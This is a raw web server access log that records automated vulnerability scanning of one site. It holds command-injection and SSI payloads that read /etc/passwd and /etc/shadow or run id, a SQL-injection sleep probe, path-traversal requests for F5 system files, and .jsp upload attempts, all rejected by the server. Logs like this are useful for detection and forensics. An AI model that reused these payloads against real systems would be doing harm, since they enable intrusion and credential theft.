195.164.49.69 - - [20/Oct/2024:16:48:10 +0000] GET /sql.php HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:48:12 +0000] GET /wp-content/plugins/adminer/adminer.php HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:48:14 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:48:16 +0000] GET /modules/sfkdbmanage/adminer.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:48:18 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:48:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:48:22 +0000] GET /admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:48:24 +0000] GET /service/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:48:26 +0000] GET /portal/WebLogin.aspx HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:48:28 +0000] GET /arcgis/rest/services HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:48:31 +0000] GET /auth/manager/sign-in/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:48:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:48:34 +0000] GET /lui/ HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:48:35 +0000] GET /currentsetting.htm HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:48:38 +0000] GET /admin/spider.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:48:40 +0000] GET /sphider/admin/admin.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:48:42 +0000] GET /search/admin/admin.php HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:48:44 +0000] GET /webshell4/login.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:48:46 +0000] GET /webalizer/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:48:48 +0000] GET /ui/index.html HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:48:50 +0000] GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:16:48:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:48:54 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:48:56 +0000] GET /plugins/CoreHome/images/favicon.png HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:16:48:58 +0000] GET /QSA/Login.aspx HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:49:00 +0000] GET /API/External/GetPrivacy HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:49:02 +0000] GET /login_up.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:49:04 +0000] GET /login.sh HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:49:06 +0000] GET /processwire/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:49:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:49:10 +0000] GET /qmailadmin/qmailadmin.cgi HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:49:12 +0000] GET /cgi-bin/qmailadmin/qmailadmin HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:49:14 +0000] GET /cgi-bin/qmailadmin HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:49:16 +0000] GET /cgi-ssl/qmailadmin/qmailadmin HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:49:17 +0000] GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:49:19 +0000] GET /apps/zxtm/login.cgi HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:49:21 +0000] GET /www/admin/index.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:49:23 +0000] GET /admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:49:25 +0000] GET /app/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:49:27 +0000] GET /jw/web/; HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:49:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:49:31 +0000] GET /explore HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:49:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:49:35 +0000] GET /accounts/login/?next=/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:49:37 +0000] GET /web/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:49:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:49:41 +0000] GET /login.htm HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:49:43 +0000] GET /weblogin.htm HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:49:45 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:49:47 +0000] GET /fileman/index.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:49:49 +0000] GET /fileman/php/fileslist.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:49:51 +0000] GET /fileman/asp_net/main.ashx HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:49:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:49:55 +0000] GET /saw.dll?bieehome&startPage=1 HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:49:57 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:49:59 +0000] GET /analytics/saw.dll?Dashboard HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:50:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:50:03 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:50:05 +0000] GET /radiusmanager/user.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:50:07 +0000] GET /user.php HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:50:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:50:11 +0000] GET /login?redirectTo=/ HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:50:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:50:15 +0000] GET /CHANGELOG.md HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:50:17 +0000] GET /glpi/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:50:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:50:21 +0000] GET /juddi/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:50:23 +0000] GET /Account/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:50:26 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:50:27 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:50:29 +0000] GET /mailman/listinfo HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:50:31 +0000] GET /listinfo HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:50:33 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:50:35 +0000] GET /graph/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:50:37 +0000] GET /h2-console/login.jsp HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:50:39 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:50:41 +0000] GET /kfm/admin/ HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:50:43 +0000] GET /sws/index.sws HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:50:45 +0000] GET /sslvpn_logon.shtml HTTP/1.1 404 1092
83.212.98.101 - - [20/Oct/2024:16:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:50:47 +0000] GET /MyDevice/Login HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:50:49 +0000] GET /episerver/cms HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:50:51 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:50:53 +0000] GET /versa/login.html HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:50:55 +0000] GET /download/inc/config.inc.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:50:57 +0000] GET /inc_config.inc.php._txt HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:50:59 +0000] GET /download/inc/tables.inc.php HTTP/1.1 404 1109
<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> - - [20/Oct/2024:16:51:35 +0000] GET / HTTP/1.1 417 1054
<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> - - [20/Oct/2024:16:51:37 +0000] GET / HTTP/1.1 417 1054
<!--#exec%20cmd="/usr/bin/id;--> - - [20/Oct/2024:16:51:37 +0000] GET / HTTP/1.1 417 1054
<!--#exec%20cmd="/usr/bin/id;--> - - [20/Oct/2024:16:51:37 +0000] GET / HTTP/1.1 417 1054
/index.html|id| - - [20/Oct/2024:16:51:38 +0000] GET / HTTP/1.1 417 1054
;id; - - [20/Oct/2024:16:51:40 +0000] GET / HTTP/1.1 417 1054
;id; - - [20/Oct/2024:16:51:40 +0000] GET / HTTP/1.1 417 1054
;id - - [20/Oct/2024:16:51:41 +0000] GET / HTTP/1.1 417 1054
;netstat -a; - - [20/Oct/2024:16:51:41 +0000] GET / HTTP/1.1 417 1054
;system('cat%20/etc/passwd') - - [20/Oct/2024:16:51:41 +0000] GET / HTTP/1.1 417 1054
|id - - [20/Oct/2024:16:51:47 +0000] GET / HTTP/1.1 417 1054
|/usr/bin/id - - [20/Oct/2024:16:51:47 +0000] GET / HTTP/1.1 417 1054
|id| - - [20/Oct/2024:16:52:21 +0000] GET / HTTP/1.1 417 1054
|/usr/bin/id| - - [20/Oct/2024:16:52:24 +0000] GET / HTTP/1.1 417 1054
83.212.98.101 - - [20/Oct/2024:16:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
||/usr/bin/id| - - [20/Oct/2024:16:52:26 +0000] GET / HTTP/1.1 417 1054
|id; - - [20/Oct/2024:16:52:27 +0000] GET / HTTP/1.1 417 1054
||/usr/bin/id; - - [20/Oct/2024:16:52:27 +0000] GET / HTTP/1.1 417 1054
;id| - - [20/Oct/2024:16:52:27 +0000] GET / HTTP/1.1 417 1054
;|/usr/bin/id| - - [20/Oct/2024:16:52:30 +0000] GET / HTTP/1.1 417 1054
\n/bin/ls -al\n - - [20/Oct/2024:16:52:30 +0000] GET / HTTP/1.1 417 1054
\n/usr/bin/id\n - - [20/Oct/2024:16:52:30 +0000] GET / HTTP/1.1 417 1054
\nid\n - - [20/Oct/2024:16:52:31 +0000] GET / HTTP/1.1 417 1054
\n/usr/bin/id; - - [20/Oct/2024:16:52:31 +0000] GET / HTTP/1.1 417 1054
\nid; - - [20/Oct/2024:16:52:36 +0000] GET / HTTP/1.1 417 1054
\n/usr/bin/id| - - [20/Oct/2024:16:52:36 +0000] GET / HTTP/1.1 417 1054
\nid| - - [20/Oct/2024:16:53:14 +0000] GET / HTTP/1.1 417 1054
;/usr/bin/id\n - - [20/Oct/2024:16:53:15 +0000] GET / HTTP/1.1 417 1054
;id\n - - [20/Oct/2024:16:53:16 +0000] GET / HTTP/1.1 417 1054
|usr/bin/id\n - - [20/Oct/2024:16:53:16 +0000] GET / HTTP/1.1 417 1054
|nid\n - - [20/Oct/2024:16:53:17 +0000] GET / HTTP/1.1 417 1054
`id` - - [20/Oct/2024:16:53:19 +0000] GET / HTTP/1.1 417 1054
`/usr/bin/id` - - [20/Oct/2024:16:53:20 +0000] GET / HTTP/1.1 417 1054
a);id - - [20/Oct/2024:16:53:20 +0000] GET / HTTP/1.1 417 1054
a;id - - [20/Oct/2024:16:53:20 +0000] GET / HTTP/1.1 417 1054
a);id; - - [20/Oct/2024:16:53:20 +0000] GET / HTTP/1.1 417 1054
a;id; - - [20/Oct/2024:16:53:25 +0000] GET / HTTP/1.1 417 1054
a);id| - - [20/Oct/2024:16:53:26 +0000] GET / HTTP/1.1 417 1054
a;id| - - [20/Oct/2024:16:54:00 +0000] GET / HTTP/1.1 417 1054
a)|id - - [20/Oct/2024:16:54:03 +0000] GET / HTTP/1.1 417 1054
a|id - - [20/Oct/2024:16:54:06 +0000] GET / HTTP/1.1 417 1054
a)|id; - - [20/Oct/2024:16:54:06 +0000] GET / HTTP/1.1 417 1054
a|id - - [20/Oct/2024:16:54:06 +0000] GET / HTTP/1.1 417 1054
|/bin/ls -al - - [20/Oct/2024:16:54:06 +0000] GET / HTTP/1.1 417 1054
a);/usr/bin/id - - [20/Oct/2024:16:54:09 +0000] GET / HTTP/1.1 417 1054
a;/usr/bin/id - - [20/Oct/2024:16:54:09 +0000] GET / HTTP/1.1 417 1054
a);/usr/bin/id; - - [20/Oct/2024:16:54:10 +0000] GET / HTTP/1.1 417 1054
a;/usr/bin/id; - - [20/Oct/2024:16:54:10 +0000] GET / HTTP/1.1 417 1054
a);/usr/bin/id| - - [20/Oct/2024:16:54:10 +0000] GET / HTTP/1.1 417 1054
a;/usr/bin/id| - - [20/Oct/2024:16:54:15 +0000] GET / HTTP/1.1 417 1054
a)|/usr/bin/id - - [20/Oct/2024:16:54:16 +0000] GET / HTTP/1.1 417 1054
a|/usr/bin/id - - [20/Oct/2024:16:54:53 +0000] GET / HTTP/1.1 417 1054
a)|/usr/bin/id; - - [20/Oct/2024:16:54:53 +0000] GET / HTTP/1.1 417 1054
a|/usr/bin/id - - [20/Oct/2024:16:54:55 +0000] GET / HTTP/1.1 417 1054
;system('cat%20/etc/passwd') - - [20/Oct/2024:16:54:56 +0000] GET / HTTP/1.1 417 1054
;system('id') - - [20/Oct/2024:16:54:56 +0000] GET / HTTP/1.1 417 1054
;system('/usr/bin/id') - - [20/Oct/2024:16:54:59 +0000] GET / HTTP/1.1 417 1054
%0Acat%20/etc/passwd - - [20/Oct/2024:16:54:59 +0000] GET / HTTP/1.1 417 1054
%0A/usr/bin/id - - [20/Oct/2024:16:54:59 +0000] GET / HTTP/1.1 417 1054
%0Aid - - [20/Oct/2024:16:54:59 +0000] GET / HTTP/1.1 417 1054
%0A/usr/bin/id%0A - - [20/Oct/2024:16:55:00 +0000] GET / HTTP/1.1 417 1054
%0Aid%0A - - [20/Oct/2024:16:55:05 +0000] GET / HTTP/1.1 417 1054
| id - - [20/Oct/2024:16:55:05 +0000] GET / HTTP/1.1 417 1054
& id - - [20/Oct/2024:16:55:39 +0000] GET / HTTP/1.1 417 1054
; id - - [20/Oct/2024:16:55:43 +0000] GET / HTTP/1.1 417 1054
%0a id %0a - - [20/Oct/2024:16:55:45 +0000] GET / HTTP/1.1 417 1054
83.212.98.101 - - [20/Oct/2024:16:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
`id` - - [20/Oct/2024:16:55:45 +0000] GET / HTTP/1.1 417 1054
$;/usr/bin/id - - [20/Oct/2024:16:55:45 +0000] GET / HTTP/1.1 417 1054
$(`cat /etc/passwd`) - - [20/Oct/2024:16:55:46 +0000] GET / HTTP/1.1 417 1054
cat /etc/passwd - - [20/Oct/2024:16:55:48 +0000] GET / HTTP/1.1 417 1054
%0Acat%20/etc/passwd - - [20/Oct/2024:16:55:49 +0000] GET / HTTP/1.1 417 1054
- - [20/Oct/2024:16:55:49 +0000] GET / HTTP/1.1 417 1054
- - [20/Oct/2024:16:55:49 +0000] GET / HTTP/1.1 417 1054
system('cat /etc/passwd'); - - [20/Oct/2024:16:55:54 +0000] GET / HTTP/1.1 417 1054
- - [20/Oct/2024:16:55:55 +0000] GET / HTTP/1.1 417 1054
195.164.49.69 - - [20/Oct/2024:16:55:59 +0000] GET //example.com/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:56:09 +0000] GET /.example.com HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:56:09 +0000] GET /example.com/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:56:09 +0000] GET /example.com HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:56:09 +0000] GET //%5C%5Cexample.com/%252e%252e%252f HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:56:10 +0000] GET //http%3A%2F%2Fexample.com HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:56:10 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:56:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:56:14 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:56:28 +0000] GET /v2/keys/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:56:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:56:36 +0000] GET /cxrestapi/help/system/version HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:56:38 +0000] GET /cxwebclient/Login.aspx HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:56:40 +0000] GET /cxrestapi/auth/identity/.well-known/openid-configuration HTTP/1.1 404 1146
195.164.49.69 - - [20/Oct/2024:16:56:42 +0000] GET /ghost/ HTTP/1.1 404 1084
83.212.98.101 - - [20/Oct/2024:16:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:00:37 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:17:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:01:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:01:30 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:01:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:02:12 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:02:15 +0000] PUT /fileserver/2ni6k7gArXuDc34m1FEIyqSgfWY.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:02:16 +0000] GET /fileserver/2ni6k7gArXuDc34m1FEIyqSgfWY.txt HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:02:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:02:19 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:17:02:20 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:17:02:21 +0000] POST /invoker/readonly HTTP/1.1 404 1094
83.212.98.101 - - [20/Oct/2024:17:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:02:42 +0000] PUT /2ni6kEbTMuGKVWULtqKFX2F7jMC.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:02:43 +0000] GET /2ni6kEbTMuGKVWULtqKFX2F7jMC.jsp HTTP/1.1 404 1105
- - - [20/Oct/2024:17:03:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:03:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:03:49 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
77.87.163.227 - - [20/Oct/2024:17:04:09 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:17:04:11 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [20/Oct/2024:17:04:33 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:17:04:34 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:17:04:35 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:17:04:36 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:17:04:37 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:17:04:38 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
83.212.98.101 - - [20/Oct/2024:17:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:06:40 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:06:40 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:07:01 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:17:07:22 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
83.212.98.101 - - [20/Oct/2024:17:07:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:07:45 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:17:08:07 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:08:28 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:17:08:50 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:08:51 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:08:51 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:09:33 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:09:35 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:17:09:36 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:17:09:56 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
77.87.163.227 - - [20/Oct/2024:17:09:57 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:17:09:57 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
83.212.98.101 - - [20/Oct/2024:17:10:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:10:48 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:17:11:09 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:17:11:31 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:11:53 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:12:14 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:12:15 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
83.212.98.101 - - [20/Oct/2024:17:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:12:37 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:12:38 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:17:13:00 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:17:13:22 +0000] GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:13:22 +0000] GET /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:13:22 +0000] POST /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:13:31 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:17:13:55 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:14:16 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:17:14:17 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:17:14:18 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:17:14:19 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:14:20 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:14:20 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:17:14:21 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:14:22 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:15:40 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:15:41 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:17:15:41 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
83.212.98.101 - - [20/Oct/2024:17:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:16:04 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:16:05 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:17:16:05 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:16:06 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:16:25 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:16:49 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:17:16:51 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
